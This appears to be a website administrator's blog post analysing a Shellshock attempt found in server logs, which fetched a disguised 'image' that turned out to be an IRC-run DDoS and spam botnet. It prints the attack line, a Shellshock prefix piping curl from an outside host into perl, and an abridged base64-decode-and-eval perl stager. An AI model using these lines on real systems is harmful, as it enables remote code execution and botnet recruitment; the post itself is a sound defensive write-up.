I'm working on a website and I, like many other admins have found some very interesting data in our logs. Please note that by executing any of the code I mention or link past this point, you'll most likely damage your computer, possibly irreversibly. With that disclaimer out of the way, let's get to the fun stuff. As I was looking through my logs for shellshock attempts, one particularly caught my eye. The attacker attempted to send me the following payload:
() { :; }; curl http://***.***.***.***/index.png | perlI decided it would be interesting to look at this "image", seeing as most images are not executable through perl. After loading the image into a text editor, my suspicions of an executable were confirmed. I found the following inside the "image"(abridged so as not to fill the page):
#!/usr/bin/perl
use MIME::Base64;
eval (decode_base64('I3lvdSBnb3Qgc2hl...DQo='));
This code essentially takes an encoded string, decodes it, and executes it. The source code is obfuscated using base64. Luckily, as demonstrated here, base64 is easily decodable. I then proceeded to decode the base64 and was excited to see that the source code was easily readable. The gist of the code that I discovered was adding the infected machine to a DDoS and spam email botnet, run through an IRC. As you can see by looking at the source (again, don't run it), the botnet is run by users "M","st0n3d","x00" and "Jorgee". Due to the nice, ascii-art filled interface, I'm guessing that they plan on selling their botnet. This attack was pretty well masked, though the server in question was patched for shellshock. Nice try though!